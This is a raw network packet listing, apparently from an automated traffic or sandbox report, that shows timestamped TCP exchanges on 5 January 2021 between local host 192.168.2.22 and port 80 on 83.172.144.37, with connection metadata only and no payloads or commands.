                                                                                        Jan 5, 2021 19:05:23.209726095 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.209763050 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.209780931 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.209789991 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.209816933 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.209837914 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.209841013 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.209867001 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.209881067 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.209898949 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.209903955 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.209939003 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.209944963 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.209981918 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.209983110 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.209995031 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.210009098 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.210031033 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.210047007 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.210061073 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.210073948 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.210108995 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.210109949 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.210134983 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.210151911 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.210167885 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.210172892 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.210207939 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.210212946 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.210249901 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.210252047 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.210268974 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.210275888 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.210313082 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.210314035 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.210328102 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.210340977 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.210376024 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.210376978 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.210402966 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.210416079 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.210436106 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.210438967 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.210474968 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.210478067 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.210514069 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.210516930 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.210530043 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.210542917 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.210577965 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.210580111 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.210599899 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.210608959 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.210644960 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.210659027 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.210670948 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.210692883 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.210707903 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.210710049 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.210743904 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.210760117 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.210783958 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.210787058 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.210809946 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.210813999 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.210839987 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.210855007 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.210880995 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.210896015 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.210911989 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.210916996 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.210943937 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.210958004 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.210977077 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.210982084 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.211018085 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.211021900 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.211059093 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.211126089 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.257222891 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.257273912 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.257313967 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.257338047 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.257409096 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.257441044 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.257474899 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.257474899 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.257481098 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.257484913 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.257488966 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.257517099 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.257541895 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.257554054 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.257580042 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.257606983 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.257610083 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.257615089 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.257646084 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.257663012 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.257673025 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.257704973 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.257709026 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.257713079 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.257744074 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.257747889 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.257785082 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.257792950 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.257808924 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.257826090 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.257847071 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.257862091 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.257872105 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.257878065 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.257908106 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.257929087 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.257934093 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.257941961 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.257972002 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.257981062 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.258007050 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.258022070 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.258047104 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.258054972 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.258071899 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.258091927 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.258111000 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.258126974 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.258145094 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.258174896 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.261913061 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.261967897 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.261995077 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.262001991 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.262033939 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.262038946 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.262059927 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.262073994 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.262099028 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.262114048 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.262125969 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.262130022 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.262162924 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.262176037 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.262188911 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.262197971 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.262238979 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.262238979 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.262264967 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.262279987 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.262303114 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.262320995 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.262327909 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.262341976 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.262363911 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.262382984 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.262389898 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.262394905 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.262424946 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.262439013 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.262460947 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.262481928 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.262494087 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.262501955 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.262527943 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.262530088 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.262564898 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.262569904 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.262589931 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.262608051 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.262629032 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.262646914 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.262655973 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.262664080 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.262692928 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.262706041 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.262727022 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.262742043 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.262768030 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.262794018 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.262794018 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.262809038 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.262830973 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.262850046 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.262857914 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.262867928 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.262892962 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.262918949 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.262953043 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.262953997 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.262964010 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.263010025 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.263020039 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.263067961 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.264720917 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.264764071 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.264790058 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.264825106 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.264857054 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.264859915 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.264872074 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.264900923 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.264914989 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.264925957 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.264928102 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.264964104 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.264976978 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.264990091 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.264991999 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.265027046 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.265045881 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.265052080 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.265067101 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.265086889 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.265110016 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.265117884 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.265120983 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.265141010 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.265162945 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.265187025 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.265192986 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.265208006 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.265223026 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.265248060 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.265261889 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.265274048 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.265285015 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.265310049 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.265336990 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.265345097 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.265346050 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.265379906 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.265388012 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.265398979 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.265448093 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.265459061 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.265460968 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.265486956 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.265522003 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.265539885 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.265547037 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.265583992 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.265584946 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.265597105 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.265624046 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.265655994 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.265664101 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.265667915 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.265688896 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.265716076 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.265726089 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.265750885 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.265762091 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.265777111 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.265788078 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.265805960 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.265832901 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.265834093 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.265844107 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.265860081 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.265894890 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.265897989 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.265912056 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.265923023 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.265928984 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.265958071 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.265963078 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.265985966 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.265993118 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.266030073 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.266033888 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.266048908 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.266053915 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.266097069 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.266124010 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.266159058 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.266192913 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.266232967 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.266257048 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.266274929 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.266283035 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.266294003 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.266310930 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.266329050 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.266338110 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.266340017 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.266366005 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.266400099 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.266424894 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.266459942 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.266494036 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.266535044 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.266558886 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.266594887 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.266627073 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.266654968 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.266671896 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.266700983 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.266717911 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.266746044 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.266771078 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.266807079 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.266820908 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.266832113 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.266833067 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.266839981 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.266845942 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.266865015 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.266869068 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.266892910 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.266928911 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.266952991 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.266998053 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.267026901 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.267040968 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.267049074 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.267054081 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.267057896 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.267062902 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.267086983 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.267087936 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.267096996 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.267103910 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.267111063 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.267122984 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.267124891 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.267137051 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.267146111 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.267159939 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.267163038 CET4916780192.168.2.2283.172.144.37
